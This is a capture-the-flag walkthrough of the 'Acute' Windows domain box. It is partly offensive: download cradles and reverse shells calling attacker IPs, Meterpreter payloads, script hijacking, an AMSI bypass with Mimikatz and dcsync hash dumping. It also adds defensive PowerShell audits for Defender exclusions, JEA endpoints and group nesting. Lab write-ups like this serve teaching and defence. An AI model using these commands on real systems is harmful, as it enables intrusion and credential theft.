Acute was a hard-rated box. Enumerating the web site turned up a Word document containing a link to PowerShell Web Access (PSWA), the hostname in its metadata and a password in its body; the username came from the site's about page, giving us PSWA access as edavies. Having landed in a container, we found a path whitelisted by Defender and an active session on the host, which let us upload a Meterpreter payload and use it to view the GUI and obtain credentials for imonks. The policy configuration on the domain controller let us escalate to jmorgan, who had impersonation privileges; from there we dumped the SAM hashes and, through password reuse, got awallace, and finally added that user to the Domain Admins group.
NMAP

```
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Issuer: commonName=acute-ATSSERVER-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-06T06:34:58
| Not valid after: 2030-01-04T06:34:58
| MD5: cf3a d387 8ede 75cf 89c1 8806 0b6b c823
|_SHA-1: f954 d677 0cf3 54df 3fa2 ed4f 78c3 1902 c120 a368
|_ssl-date: 2022-02-13T14:22:11+00:00; -3s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -3s
```
Surprisingly, this box had only one port open, which was port 443.

PORT 443 (HTTPS)

Visiting the web server we get a 404 status code. From the nmap scan we can see the domain name atsserver.acute.local, so let's add this to the /etc/hosts file. After adding the domain and accessing it we can see a web page. The Wappalyzer browser extension shows that the site is running WordPress. Clicking on the courses link just gives a 404 status code, as the page doesn't exist. Running dirsearch to fuzz for files and directories didn't reveal anything interesting.

Viewing the about me section we see a link to a Word document. On opening it we see two links, but both give a 404 status code. Scrolling down we can see a password, Password1!, and a URL to access Windows PowerShell Web Access.

I tried this password for Lois, as at the end of the document we can see that he is allowed to change group member permissions, but it failed. Going back to the about page we can see some user names.
Foothold

Now we don't know the username, and we also don't know the name of the computer, so let's run exiftool on the Word document. This reveals the computer name, Acute-PC01. I tried FCastle as a username with the password we found, but it didn't work; I went on trying the usernames found on the about page, and EDavies worked.

We got a PowerShell session through the browser, but it seems we are in a container because the IP is 172.16.22.2. Running the net user command to check which groups we are in gives an error that this user doesn't exist.

We can try to scan 172.16.22.1, as it's the gateway and may have some interesting ports open. Since we can't really install nmap on this machine, we could try a PowerShell script for scanning ports: https://github.com/JustinGrote/PoshNmap

After transferring the script, trying to run it fails because running scripts is disabled. We can instead load it through IEX, which imports the script into memory:

```
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.56:2222/powershell-nmap.ps1')
```

The ports it shows are DNS, SMB, WinRM and LDAP, which could mean this is a domain controller. I wasn't able to make the script scan port 88, so I moved on.
In the Users directory we can see a few users, but we don't have permissions to view their contents. Going into the C drive we see a folder named Utils, which appears to have no files. Viewing hidden files with dir -Force we can see an .ini file, which suggests that Windows Defender doesn't check this directory for malicious files. Whitelisted directories can also be found by looking at Defender's exclusion paths (https://petri.com/microsoft-defender-exclusions-list-windows-10/):

```
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
```
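An excluded, world-writable folder like C:\Utils is what turns a Defender exclusion into a finding, so a defender wants two things: the current exclusion list and a record of when exclusions were added. The following PowerShell is an added example and is not part of the original writeup; it reads the exclusions from both Get-MpPreference and the registry key queried above, then pulls Defender's "configuration changed" events (event ID 5007) whose message mentions exclusions. It assumes it is run as a local administrator on the host being audited, and that the 5007 message text contains the word "Exclusions" for exclusion changes, which is how the registry path appears in that event.

```powershell
# Added example, not from the original writeup: enumerate Defender path
# exclusions from both the cmdlet and the registry key queried above, then pull
# the Defender 'configuration changed' events (ID 5007) that mention exclusions,
# so a defender can see what is excluded and when each exclusion appeared.
# Assumes it runs as a local administrator on the host being audited.

function Get-DefenderPathExclusions {
    $paths = @()
    try {
        $paths += (Get-MpPreference -ErrorAction Stop).ExclusionPath
    } catch {
        Write-Warning "Get-MpPreference failed: $($_.Exception.Message)"
    }
    # Same data the writeup read with: reg query "HKLM\...\Windows Defender\Exclusions" /s
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
    if (Test-Path -LiteralPath $key) {
        $paths += (Get-Item -LiteralPath $key).GetValueNames()
    }
    $paths | Where-Object { $_ } | Sort-Object -Unique
}

function Get-DefenderExclusionChanges {
    param([int]$Days = 30)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007                      # "configuration has changed"
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Exclusions' } |
        ForEach-Object {
            [pscustomobject]@{
                Time   = $_.TimeCreated
                # keep only the lines of the message that carry the exclusion key/value
                Change = (($_.Message -split "`r?`n") | Where-Object { $_ -match 'Exclusions' }) -join ' ; '
            }
        }
}

'--- current path exclusions ---'
Get-DefenderPathExclusions | ForEach-Object {
    [pscustomobject]@{
        Path   = $_
        Exists = Test-Path -LiteralPath $_   # wildcard exclusions will report $false here
    }
}

'--- exclusion-related configuration changes (last 30 days) ---'
Get-DefenderExclusionChanges -Days 30 | Sort-Object Time
```

Any excluded path that low-privileged users can write to deserves the same scrutiny a writable Program Files folder would get; the 5007 timeline tells you whether the exclusion was part of the build or appeared later.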
So first we need to generate an msfvenom payload for Meterpreter:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=2222 -f exe > shell.exe
```

Now we host this payload using python3. Checking our Meterpreter listener, we get a shell. With a Meterpreter session, I spawned PowerShell to download chisel so I could scan the gateway through a SOCKS5 proxy. Make sure to add socks5 127.0.0.1 1080 to /etc/proxychains.conf.

This confirms it really is the domain controller, as Kerberos is running. I enumerated the whole container but there wasn't anything interesting; after running winPEAS on the container it showed that there was one RDP session active. This can also be found with query user, which lists the active logon sessions.
Privilege Escalation (imonks)

Using the screenshare feature, we can see the GUI of the Windows machine, and there was a script running which was connecting to the actual host machine with the credentials imonks:W3_4R3_th3_f0rce.

We need to make a secure password string and a credential object:

```
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('acute\imonks',$pass)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { whoami } -Credential $credential
```

But we can only run limited commands on ATSSERVER because of the dc_manage configuration, a Just Enough Administration (JEA) endpoint that only exposes specific commands for managing the server (http://woshub.com/using-powershell-just-enough-administration-jea/):

```
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Get-Command } -Credential $credential
```

We can run Get-Alias to see the shortcuts for these commands. In imonks's directory we see a PowerShell script, wm.ps1.
Privilege Escalation (jmorgan)

This script uses acute\jmorgan's secure password to run Get-Volume on the container where we have the web-based PowerShell, so what if we made it execute our payload in C:\Utils, which would give us a reverse shell as jmorgan? To do this we can use PowerShell's Get-Content and Set-Content cmdlets (https://mcpmag.com/articles/2018/08/08/replace-text-with-powershell.aspx):

```
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { (Get-Content -path C:\Users\imonks\Desktop\wm.ps1) -replace 'Get-Volume','cmd.exe /c C:\Utils\uwu.exe' } -Credential $credential
```

With this command we can replace Get-Volume in the script with our payload, but the result isn't written back to the file; it is only printed to the PowerShell console. So with Set-Content we write the output to the file itself and then run the PowerShell script:

```
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { ((Get-Content -path C:\Users\imonks\Desktop\wm.ps1) -replace 'Get-Volume','cmd.exe /c C:\Utils\uwu.exe') | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1 } -Credential $credential
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 } -Credential $credential
```
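The dc_manage endpoint is only as tight as its role capability: once Get-Content and Set-Content are visible with unconstrained parameters, the "limited commands" restriction no longer limits anything, because the connecting user can read and rewrite any file their token can reach, as the wm.ps1 edit above shows. As an added example that is not taken from the box, here is how a JEA role capability and session configuration would be defined so the endpoint exposes a volume report without general-purpose file cmdlets, and pins any file read to a fixed path pattern. The function name Get-DcVolumeReport, the C:\JEA paths and the ACUTE\DC Operators group are assumptions.

```powershell
# Added example (not the box's own configuration): a JEA endpoint that exposes a
# volume report without handing out general-purpose file cmdlets.
# Assumed names: C:\JEA\..., ACUTE\DC Operators. Run as an administrator on the server.

$roleDir = 'C:\JEA\RoleCapabilities'
New-Item -ItemType Directory -Path $roleDir -Force | Out-Null

# 1. Role capability: what a connected user may run.
#    Get-Volume is exposed directly; Set-Content is not exposed at all. If reading
#    a file really is required, pin the Path parameter to a pattern so the user
#    cannot point it at another profile or at Program Files.
New-PSRoleCapabilityFile -Path (Join-Path $roleDir 'DcVolumeReport.psrc') `
    -VisibleCmdlets @(
        'Get-Volume',
        @{ Name = 'Get-Content'; Parameters = @{ Name = 'Path'; ValidatePattern = '^C:\\Reports\\[^\\]+\.txt$' } }
    ) `
    -VisibleFunctions 'Get-DcVolumeReport' `
    -FunctionDefinitions @{
        Name        = 'Get-DcVolumeReport'
        ScriptBlock = { Get-Volume | Select-Object DriveLetter, FileSystemLabel, SizeRemaining, Size }
    }

# 2. Session configuration: who gets which role, and under what identity.
#    RestrictedRemoteServer hides everything not listed in the role. A virtual
#    account runs the commands as a temporary local account rather than as the
#    connecting user, so what the endpoint can touch no longer depends on that
#    user's own file permissions. Transcripts give the defender a record of
#    every command issued through the endpoint.
New-PSSessionConfigurationFile -Path 'C:\JEA\dc_manage.pssc' `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEA\Transcripts' `
    -RoleDefinitions @{ 'ACUTE\DC Operators' = @{ RoleCapabilityFiles = (Join-Path $roleDir 'DcVolumeReport.psrc') } }

# 3. Validate the file before registering; -Force replaces an existing endpoint of that name.
if (Test-PSSessionConfigurationFile -Path 'C:\JEA\dc_manage.pssc') {
    Register-PSSessionConfiguration -Name dc_manage -Path 'C:\JEA\dc_manage.pssc' -Force
}

# 4. From a client, the same Get-Command check used in the writeup should now
#    list only the function above, the pinned Get-Content, Get-Volume and the
#    JEA defaults (Get-Command, Exit-PSSession, ...):
# Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Get-Command } -Credential $credential
```

The review question for any JEA endpoint is the one this box answers the hard way: for every visible cmdlet, can a parameter be pointed at something outside the task the role is meant to allow? Get-Content, Set-Content, Invoke-Expression and Start-Process are the usual offenders.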
After getting jmorgan we can check this user's privileges with getprivs, or if we want to use cmd we can use whoami /all. Through this privilege we can become the SYSTEM user on the container by running getsystem, and then dump the NTLM hashes on the container.
Privilege Escalation (awallace)

Grabbing the Administrator's and Natasha's hashes we can check whether they are crackable; using CrackStation we can crack the Administrator's hash and get the password Password@123. On ATSSERVER we have three users we can try this password for: Administrator, lhopkins and awallace. I tried lhopkins but it failed; moving on to awallace it worked, but we still have only limited commands we can run on ATSSERVER.

We don't actually see anything other than a keepmeon folder in C:\Program Files. There's a .bat file in that folder; reading its contents:

```
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
    if not "%%x" == "%~0" call "%%x"
)
```
Analyzing this batch script: there's a loop where /R means it recurses through the current directory tree looking for .bat files, and calls each one it finds other than itself. The comment also says this batch script runs as the lhopkins (Lois) user.
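What makes this script dangerous is the combination: it runs every five minutes under a privileged user account, and it executes whatever .bat files appear under a folder that another account can write to. As an added example that is not part of the writeup, the following PowerShell audit generalises that check to every scheduled task on a host: for each enabled task that runs as a named user rather than a service account, it looks at the directory holding the task's action and reports whether broad groups such as BUILTIN\Users can write there. The list of principals treated as "broad" is an assumption, and it assumes the periodic job is implemented as a scheduled task and that the script is run as a local administrator.

```powershell
# Added example (not from the writeup): find scheduled tasks that run as a user
# account and whose action lives in a directory broad groups can write to.
# Run as a local administrator. $broad is an assumed list; extend it as needed.
$broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
$writeBits = [System.Security.AccessControl.FileSystemRights]'Write, CreateFiles, Modify, FullControl'

function Get-BroadWriters {
    param([string]$Dir)
    (Get-Acl -LiteralPath $Dir).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       (($_.FileSystemRights -band $writeBits) -ne 0) -and
                       ($broad -contains $_.IdentityReference.Value) } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
}

function Get-WritableTaskDirectories {
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task  = $_
        $runAs = $task.Principal.UserId
        # Service accounts are out of scope: the finding is a task that lends a
        # *user* account's rights to anything dropped into the folder.
        if (-not $runAs -or $runAs -match '^(SYSTEM|LOCAL SERVICE|NETWORK SERVICE)$') { return }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            # Expand %VAR% references and strip quotes before taking the directory.
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            $dir = if ($action.WorkingDirectory) { $action.WorkingDirectory } else { Split-Path -Parent $exe }
            if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
            $writers = Get-BroadWriters -Dir $dir
            [pscustomobject]@{
                Task      = "$($task.TaskPath)$($task.TaskName)"
                RunsAs    = $runAs
                Command   = "$($action.Execute) $($action.Arguments)".Trim()
                Directory = $dir
                Finding   = if ($writers) { "directory writable by $($writers -join ', ')" } else { 'ok' }
            }
        }
    }
}

Get-WritableTaskDirectories | Sort-Object Finding -Descending | Format-Table -AutoSize
```

A task like keepmeon would show up with RunsAs set to the lhopkins account and a Finding naming whichever group can create files in C:\Program Files\keepmeon; the fix is to make that folder writable only by administrators, or to have the job run a single fixed script rather than everything it finds.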
Going back to the Word document, it mentions that Lois is the only user who can change group membership and that only he can become site admin. Running net group /domain we can see a group named Site_Admin; checking the description of this group, it says it has access to the Domain Admins group. So using Set-Content we can write the command net group Site_Admin "awallace" /add /domain into a .bat file to add this user to the Site_Admin group:

```
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock { Set-Content "C:\Program Files\keepmeon\uwu.bat" -Value 'net group Site_Admin "awallace" /add /domain' } -Credential $credential
```

Checking the groups awallace is in, we can see he has been added to Site_Admin. Being in this group we can access the Administrator's directory and get the root flag.
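The Site_Admin finding comes down to two things a defender can enumerate directly: which groups are nested into Domain Admins, and which principals are allowed to change those groups' membership (the right the Word document says Lois holds). As an added example that is not part of the writeup, the following PowerShell does both with the ActiveDirectory module: it walks the nesting under Domain Admins, reads each group's ACL for rights that permit editing membership, and finally prints the flattened user membership. The GUID is the well-known schemaIDGUID of the member attribute; running it against a real domain as a user with read access is an assumption, and the default entries (Domain Admins, Enterprise Admins, SYSTEM) will appear alongside any delegated principal, which is the one to look at.

```powershell
# Added example (not from the writeup): show the real membership of Domain Admins,
# including groups nested into it, and list who may change each group's membership.
# Assumes RSAT/ActiveDirectory is installed and the caller can read the directory;
# the AD: drive used below is created when the module is imported.
Import-Module ActiveDirectory

# Well-known schemaIDGUID of the 'member' attribute
$memberAttrGuid = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'

function Get-NestedGroups {
    param([string]$Group, [System.Collections.Generic.HashSet[string]]$Seen)
    foreach ($m in Get-ADGroupMember -Identity $Group) {
        # Only recurse into groups, and never into one already visited (cycles happen).
        if ($m.objectClass -ne 'group' -or -not $Seen.Add($m.DistinguishedName)) { continue }
        $m
        Get-NestedGroups -Group $m.DistinguishedName -Seen $Seen
    }
}

function Get-MembershipWriters {
    param([string]$DistinguishedName)
    (Get-Acl -Path "AD:\$DistinguishedName").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                # rights that imply control of the whole object
                $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner' -or
                # WriteProperty on all attributes (empty GUID) or specifically on 'member'
                ($_.ActiveDirectoryRights -match 'WriteProperty' -and
                 ($_.ObjectType -eq [guid]::Empty -or $_.ObjectType -eq $memberAttrGuid))
            )
        } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
}

$seen   = [System.Collections.Generic.HashSet[string]]::new()
$root   = Get-ADGroup -Identity 'Domain Admins'
$groups = @($root) + @(Get-NestedGroups -Group $root.DistinguishedName -Seen $seen)

foreach ($g in $groups) {
    $desc = (Get-ADGroup -Identity $g.DistinguishedName -Properties Description).Description
    [pscustomobject]@{
        Group          = $g.Name
        NestedUnderDA  = ($g.DistinguishedName -ne $root.DistinguishedName)
        Description    = $desc
        CanEditMembers = (Get-MembershipWriters -DistinguishedName $g.DistinguishedName) -join ', '
    }
}

'--- effective (flattened) members of Domain Admins ---'
Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Select-Object -ExpandProperty SamAccountName
```

On a domain laid out like this box, Site_Admin would appear with NestedUnderDA set to True and CanEditMembers listing the account Lois uses; either fact on its own is worth a ticket, and together they are a one-hop path to Domain Admins for anyone who can run code as that account.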
Even though this is where the box ends, I wanted to see if we could dump the hashes. With the chisel SOCKS proxy running, I tried using secretsdump.py with awallace's credentials, as we are in the Site_Admin group, which is an alias for the Domain Admins group. It didn't allow authenticating with credentials, so instead I tried generating a TGT for the user and using the script with Kerberos authentication, exporting the `KRB5CCNAME` variable. But this again kept failing.

I went back to awallace and tried getting a reverse shell. Since we have only limited commands to execute, we can't directly make a request to our server to download nc or anything else; instead we can use variables in the session to store any command, and we can use `r`n for a new line in a string (https://shellgeek.com/how-to-add-newline-to-string-or-variable/).

Also, throughout the box I used Invoke-Command with the computer name, which creates an ad hoc remote PowerShell session on ATSSERVER; as soon as the command exits the session is cleared, so any variables we create are removed. For a persistent session we can use New-PSSession (https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/session-management), keeping awallace's credentials:

```
$sess = New-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $credential
```

This stores the command that downloads nc64.exe (make sure to get version 1.12, as Defender removes the previous one):

```
Invoke-Command -Session $sess -ScriptBlock { $var1 = "powershell.exe -c Invoke-WebRequest 'http://10.10.14.61:3333/nc64.exe' -OutFile 'nc64.exe' `r`n " }
```

This command will be executed after nc64.exe is downloaded:

```
Invoke-Command -Session $sess -ScriptBlock { $var2 = "nc64.exe 10.10.14.61 5555 -e cmd.exe `r`n " }
```

This writes the values of both variables into the .bat file:

```
Invoke-Command -Session $sess -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\uwu.bat" -Value $var1,$var2 }
```

Since lhopkins has rights to add members to the Site_Admin group, we can add him to this group, which has the same privileges as the Domain Admins group.

Here we can't just use the Mimikatz PowerShell script to dump hashes because of AMSI, but we can bypass it using the Invoke-OneShot script (https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093), which imports Mimikatz at the same time. Make sure to have the Mimikatz script on your local machine and change the script's download location to your IP. This dumped LSASS; we can also dump NTDS.dit with lsadump::dcsync /domain:acute.local /all.
References
- https://github.com/JustinGrote/PoshNmap
- https://4sysops.com/archives/using-a-local-variable-in-a-remote-powershell-session/
- http://woshub.com/using-powershell-just-enough-administration-jea/
- https://petri.com/microsoft-defender-exclusions-list-windows-10/
- https://mcpmag.com/articles/2018/08/08/replace-text-with-powershell.aspx
- https://ss64.com/nt/for_r.html
- https://techgenix.com/output-contents-to-a-file-powershell/
- https://shellgeek.com/how-to-add-newline-to-string-or-variable/
- https://devops-collective-inc.gitbook.io/secrets-of-powershell-remoting/session-management
- https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093